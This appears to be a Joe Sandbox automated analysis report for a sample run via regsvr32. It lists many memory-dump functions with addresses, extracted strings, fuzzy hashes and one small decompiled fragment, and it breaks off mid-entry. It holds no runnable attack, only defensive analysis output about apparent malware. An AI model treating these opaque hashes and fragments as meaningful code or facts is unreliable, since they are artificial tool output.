Instruction ID: 82351df424502fc8d049b0c1a5cf9ff2438e7ac67077770958b863a66ce3b17f
Opcode Fuzzy Hash: ea798d718599b15374f3be6d712fc75d69b65069e54809637e576d117a3edd33
Instruction Fuzzy Hash: FC41C6B190038A8BCB48DF64C99A5EE7BB1FB48358F114A2DF86697350D3B49664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 01298A2C Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

j, xrefs: 01298AB4
[, xrefs: 01298AF9

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j$[
API String ID: 0-3696242357
Opcode ID: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction ID: 7a5711dcc949209ac188d457ea91610dcb514498ad84654dd456b9ed5b92a097
Opcode Fuzzy Hash: d41960ad032d02aa43a06cacd4c3fdf514c501a5b8f19463d910750cf599ef8a
Instruction Fuzzy Hash: AB41E5B090074E8BDB48DF64C48A5DE7FB1FB58398F11861DE856A6290D3B4D6A4CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 0129B130 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

=K, xrefs: 0129B23E
d%, xrefs: 0129B189

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =K$d%
API String ID: 0-2790768846
Opcode ID: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction ID: 47e208e42713e5aaed333a1b80a991fbb4d0163c60a691ee65f61a2efe59e5ca
Opcode Fuzzy Hash: 046eeb3a7e312ef4597a0ceadb2c0b4017743bcb75cc6b1a2b492f4bea5b2233
Instruction Fuzzy Hash: 0141E5B090074E8FDF48CF64C88A5DE7BF0FB58358F10461DE86AA6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0129C058 Relevance: 2.6, Strings: 2, Instructions: 97COMMON

Download Yara Rule

Strings

+ , xrefs: 0129C10B
S", xrefs: 0129C1A0

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: + $S"
API String ID: 0-2880694137
Opcode ID: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction ID: 44fd0552f754183863fa8b23af1c642b0c114345f5ef3ad4941a52d6444af0a0
Opcode Fuzzy Hash: 0a120380ba46ade300821e018fa54fd0c93605979f7eaf18b3fcea56eb471111
Instruction Fuzzy Hash: DA51B5B090078E8FDF88DF64C88A5DE7BB0FB58358F10461DE866A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 012895BC Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

`, xrefs: 012896B4
#|, xrefs: 0128966C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #|$`
API String ID: 0-1687004633
Opcode ID: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction ID: 833a945be234feed0280b9158ca0ffdcc5fe3e424e96e00c7b4f402cef9d84d4
Opcode Fuzzy Hash: 1dbd93d6a4af5ab501e4fd27d4ca136d79918f9d458c9bd4a0bbcc41cb67c6cc
Instruction Fuzzy Hash: 0041D5B190078E8FDF88DF68C88A4DE7BF0FB58358F014619F856A6250D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0129C44C Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

j~;, xrefs: 0129C5B3
c, xrefs: 0129C581

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c$j~;
API String ID: 0-3832213246
Opcode ID: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction ID: 39cb50dc45ea51819470d1767341b90bfde8cb3384962a6d3a60b2ec64cfb28b
Opcode Fuzzy Hash: 18b6bb2236c3d81442985b19945feacbaaab319f380d4d3d69fe49ad0df2425e
Instruction Fuzzy Hash: 8441A5B080078E8FDB88DF64C88A1DF7BB0FB54358F104A19EC6696250D3B49661CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 01287C08 Relevance: 2.6, Strings: 2, Instructions: 82COMMON

Download Yara Rule

Strings

W, xrefs: 01287C6A
-h, xrefs: 01287D15

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -h$W
API String ID: 0-4146498651
Opcode ID: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction ID: 6e402e869924908fda17c36125418da69a1643421726c45ce0267687dcfdfbce
Opcode Fuzzy Hash: ac1beb8efc805ec182d5897ee57bff0eb204918572bad0795e6a59dbf0da3e57
Instruction Fuzzy Hash: 1C41C4B590038E9FDB44CF68D88A5CE7BF0FB48358F104619F869A6250D3B49664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 012A8A00 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

fp, xrefs: 012A8AC9
., xrefs: 012A8A70

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .$fp
API String ID: 0-3298127435
Opcode ID: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction ID: 51d071c89fd420a59fb0251b5d8ac3987ca7874468e2adf834216b36ca9dbb8c
Opcode Fuzzy Hash: ddbbea76e87b75a0423c6c5dce58b2b1cb486f12ce18d3dc43adec7097cd1835
Instruction Fuzzy Hash: FC41F4B190474E8FDB88CF64C48A4DE7FB0FB28398F104619E856A6290D3B89665CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 01288FB0 Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

", xrefs: 01288FC4
Zs, xrefs: 01288FCC

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$Zs
API String ID: 0-3922668666
Opcode ID: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction ID: f1d62621bd08a38fa15a490595be93b85bae5397fb0987493b8f1264ce03d9fe
Opcode Fuzzy Hash: 68d2441b249f9a93f4c72500e977988d29b83f362e05d91f8df6eb9a31c852ba
Instruction Fuzzy Hash: 803192B0529380ABC388DF28D19A91EBBE1FBD5708F806A1DF8C286390D374D406CB43

Uniqueness

Uniqueness Score: -1.00%

Function 01287840 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

s [, xrefs: 01287898
XW, xrefs: 012878F9

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: XW$s [
API String ID: 0-2366283936
Opcode ID: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction ID: c8620a86b0501fca327921337904d07bbca0ac58b79dbc40019122cd377fd21c
Opcode Fuzzy Hash: 76c1b907ae6b42603d5a16b60f951f87ab574e6943cc66960cdc964ad17b59d9
Instruction Fuzzy Hash: 623190B190478E8FDF48DF28D88949A3BE1FB48304B004A1DFC6AD7250D7B4D665CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01284C84 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

jn(, xrefs: 01284D02
4V, xrefs: 01284D12

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4V$jn(
API String ID: 0-2529302498
Opcode ID: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction ID: cb5d544f3b4b9f04c9dfd671481ec3bad593690e5eb4dddf862df6e3aa1dae86
Opcode Fuzzy Hash: 4347d8350eb776fef7c9ebb529210ab3cab55532b2ec0dd05afe6f01a2bbb923
Instruction Fuzzy Hash: 17317EB1529381AFC398CF28C48A91ABBE0FBC9318F806A1DF8C686260D774D555CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0128F65C Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

', xrefs: 0128F759
%6, xrefs: 0128F74C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '$%6
API String ID: 0-1852427169
Opcode ID: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction ID: 05249663a0179330ad45d21934dcfd5c9628912d79576b4f5c22a08ed84997fc
Opcode Fuzzy Hash: 42a3203eb3ebe9af52f3f94821d08fbcbfa30131473cda762de5c23950ca3f94
Instruction Fuzzy Hash: CD316FB5568381ABD388DF28C48A81ABBF1FB89308F806A1DF8C6DB251D775D545CB43

Uniqueness

Uniqueness Score: -1.00%

Function 01288A8C Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

uS, xrefs: 01288B32
J, xrefs: 01288AB1

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: uS$J
API String ID: 0-437994327
Opcode ID: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction ID: 70730158411ace5d9e69e881e7f7670d217f86b5127894a7b51cee3a59cb0e4a
Opcode Fuzzy Hash: a2b51c32bad19ba39d4e427c2f512c2a59b50882f014cb68f936c9e880adca61
Instruction Fuzzy Hash: 7D31D7B190034E8FDB84DF64C88A5DE7FB0FF28358F104619E859A62A0D3B88695CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 01290A70 Relevance: 2.6, Strings: 2, Instructions: 62COMMON

Download Yara Rule

Strings

+@, xrefs: 01290B69
`.P, xrefs: 01290B2E

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +@$`.P
API String ID: 0-1189405855
Opcode ID: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction ID: 39de2ea6a026fc69778914cf9e44a5f31bb4615b8119a4e03ad8497b2faa6ad6
Opcode Fuzzy Hash: a70f442d9e9e175520b0b0d93d41500bfede9fc32031e6ea222cabd22b859c02
Instruction Fuzzy Hash: A1316FB15187848FD348DF28C45941BBBE1BB9C758F804B1DF4CAAA260D778D645CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 01283CF4 Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

R, xrefs: 01283D10
^, xrefs: 01283D00

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^$R
API String ID: 0-3595634639
Opcode ID: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction ID: 7dec6e6ff202478201587024085261afee01554c9ae7569198c8fcb843946a7e
Opcode Fuzzy Hash: b7e08d49ea1b5b1d89cab638ecb6b58cb02da954cd334f399a60917b828591f9
Instruction Fuzzy Hash: 112180B0528781AFC398DF28D49591FBBF1BB88744F806A1DF8C686390D779D505CB46

Uniqueness

Uniqueness Score: -1.00%

Function 01282FD4 Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

w, xrefs: 0128305F
t^, xrefs: 01282FEB

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t^$w
API String ID: 0-1486493484
Opcode ID: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction ID: 0fcab25796e593e8dfb7fafe86ea51ff53beb953310655f2f877b1f2b437242d
Opcode Fuzzy Hash: d9d2b37262035f156a08dae9f88ea85b7583d03cc1c0d0918aa86d9476248fb5
Instruction Fuzzy Hash: B1219DB090078E8FDB48DF68D8491DE7BB0FB18308F014A59F82996290D3B89665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 01291924 Relevance: 1.7, Strings: 1, Instructions: 428COMMON

Download Yara Rule

Strings

#, xrefs: 01291BB3

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #
API String ID: 0-606707520
Opcode ID: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction ID: 12795cdf2e8874846623986f85704e3dc1e8d55315c6f471c882c04e75a423a3
Opcode Fuzzy Hash: 99547394c1cfeee33f3fbc263d3122085f4524b50faca7c5dbf1af4b9be79401
Instruction Fuzzy Hash: 4B22277091470AEFDF58DFA8C45A49EBBF1FB44348F00816DE84AAB290D7749A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D28 Relevance: 1.6, APIs: 1, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00000001180008D28(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t25;
				void* _t27;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rbx;
				 *(_t30 + 0x10) = _t25;
				 *((long long*)(_t30 + 0x18)) = __rsi;
				_t27 = (_t25 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t27)) != dil) goto 0x80008d56;
				if (_t27 + __rdx -  !__r8 <= 0) goto 0x80008d92;
				return __rdx + 0xb;
			}

0x180008d28
0x180008d2d
0x180008d32
0x180008d56
0x180008d5d
0x180008d70
0x180008d91

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction ID: 1f7af7de608e037a3e69fafdab2b7a4d19b0596ea53e23cf5e8b59c7fdfa90c1
Opcode Fuzzy Hash: 9c9a505e11390fee30cde8d58ba8d3236255a76ec469928530f6db279ba29baa
Instruction Fuzzy Hash: D151C432700B9489FBA1DB72A8447DE7BA1B7587D4F148225FE9827B99DF38C605D700

Uniqueness

Uniqueness Score: -1.00%

Function 01291030 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

ef, xrefs: 012911CE

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ef
API String ID: 0-3522424648
Opcode ID: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction ID: abf90b529df4ef6c8b850fd27f9ada2023ced89667b029e52b4651e61d5ad58d
Opcode Fuzzy Hash: 63cf04038136136116a979567ba4b26417661d5f843165bc7989bb71bb8234a9
Instruction Fuzzy Hash: 850228B0A14709EFDF58DF68C08959EBBF2FB44314F00816DE80AAB260D775DA59CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0128EF14 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

x]!-, xrefs: 0128F2E3

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: x]!-
API String ID: 0-585868058
Opcode ID: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction ID: 0954d2f7c83ee8345f4cda680ca90c31eebdb03006ec540f3f36822b621369b0
Opcode Fuzzy Hash: cf2a29744dbdbd02a151a4b044d1109f6beb7998a165a5b3606498e8daacfd79
Instruction Fuzzy Hash: 2DD189B1A0060DCFDBA8CF78C54A5DD7BF1BB48308F606129E826AA2B6D7749905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0129A8B0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

}^O, xrefs: 0129ABB5

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: }^O
API String ID: 0-3039680174
Opcode ID: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction ID: 58f235346dae97e7f1f1dac0bf59b9e53b57f9228ba42c03dfa9632673b512e8
Opcode Fuzzy Hash: 2737519d22680c9269c125336f90b0d45ca51200b7d26ea2addf6a8d31d5b6e5
Instruction Fuzzy Hash: 92A17BB2502749CFDB98DF28C69A59D3BE1FF55308F004129FC1E9A2A0D3B4E925CB49

Uniqueness

Uniqueness Score: -1.00%

Function 01294D20 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

RH, xrefs: 01294D53

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: RH
API String ID: 0-2975065227
Opcode ID: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction ID: e7441ad45c45c0120d9b0fb018761c7269460ebbc9f1c9b88254cba6f6c5268e
Opcode Fuzzy Hash: da44171f9c80a2056ccb259cc2b9eac6e02ade2ac8d9ef905a94791c40a4a894
Instruction Fuzzy Hash: 8951187111C7848FC7A8DF18D4C66AAB7E0FB94310F90991DE8CEC7255DF74A88A8B46

Uniqueness

Uniqueness Score: -1.00%

Function 0128BE90 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

Y, xrefs: 0128BEF2

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction ID: 1ce5019785a5c15a3a7ad0624eb774d1795d6d93a906ba0df8681b088325960e
Opcode Fuzzy Hash: c7ef7c05ef0c3c9f2aed6826f015ad160cfcc6abce9b29eb71b79f5d508516d5
Instruction Fuzzy Hash: 9951F4715107898BDB59DF28C88A0DD3BA1FB5935CF024318FD8EA62A1D77CD845CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0128D6CC Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

vOs, xrefs: 0128D8D7

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: vOs
API String ID: 0-1852020951
Opcode ID: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction ID: 1fe256c3fea64a334f85e05758704a3dc531a8be16094bdbb79f921a82f7e977
Opcode Fuzzy Hash: 0a3c35978ef4d06ef910e88490b5bce2e9beff051be12035b9eadbcefa2f22bf
Instruction Fuzzy Hash: B2619DB190030ECFDB49DF68D48A5CE7FB0FB24398F204519E845A6260D7B896A8CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0128461C Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

*), xrefs: 01284691

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *)
API String ID: 0-1811957435
Opcode ID: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction ID: b55840a8a7bec252f9bfc51c6c2d4c86e91a6b3ecaf91c16af1bd5f124523ef1
Opcode Fuzzy Hash: c39f41b8af2b9280dd7c00c4ba0ddd05394017a856c7f82ca50d576e38ac2643
Instruction Fuzzy Hash: E031953061CB898FC728EF29D08556ABBE0FB99305F50472EE58AC7355DB70D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0128F77C Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

t, xrefs: 0128F7C6

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t
API String ID: 0-1935021737
Opcode ID: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction ID: e1e9a49e651b2690cb1b062ef4693be2c96d04d3402235047b3e15b2a4e8a728
Opcode Fuzzy Hash: 783391770682b9c9d34a01018b97ccb4612aed757a5715f7015a6466eeb6abdd
Instruction Fuzzy Hash: 0231D33011DB458FE768EF2CD48516ABBE0FB96350F104A5DE5CAC7266D730D805CB82

Uniqueness

Uniqueness Score: -1.00%

Function 012A181C Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

__, xrefs: 012A18BC

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: __
API String ID: 0-2267946753
Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction ID: 4bb1e3c02c132a31cbde143209c898fa6c69d787d16459cb1e27ab0f4684ef4e
Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction Fuzzy Hash: A741F070508B858BE758DF29C18941ABBF1FBC9348F500A2DF69A873A0C775D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01289408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

GSn, xrefs: 01289530

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GSn
API String ID: 0-1733515909
Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction ID: b1899d3fa5924206cfd3babe07f7f2d1f8db78314aae26ea311ffc7c91c10c58
Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction Fuzzy Hash: 9851D7B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 012A8500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

8=, xrefs: 012A8591

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8=
API String ID: 0-237953557
Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction ID: b55d39608118ca34ac66b3b4f35322091c4f774894c330491945a35da9a5b542
Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction Fuzzy Hash: 2E314B30218B458BDB5CDF2CC49912ABBE1FBD9301F448A2DE58AD7365DB34D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 012920E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

K, xrefs: 0129217C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: K
API String ID: 0-425913083
Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction ID: aed56c3fded3d19c0a8808ec6cb48f01f56ffe31c6eeb364253f646a243a0fb8
Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction Fuzzy Hash: A141F7B180438ECFDB48CF68D8865DE7BB0FB58348F114A19E866A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 012908CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

t", xrefs: 0129092F

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t"
API String ID: 0-2131657386
Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction ID: c6f376c23349ad84e2bdc99c252db9570c93fa89c20ca8784534c44ea026276c
Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction Fuzzy Hash: 7641D67181070D8BDF48DF64C48A0DE7FB0FB083ACF65621DE81AA6290D3B89585CF99

Uniqueness

Uniqueness Score: -1.00%

Function 01293CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

gLv, xrefs: 01293D74

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

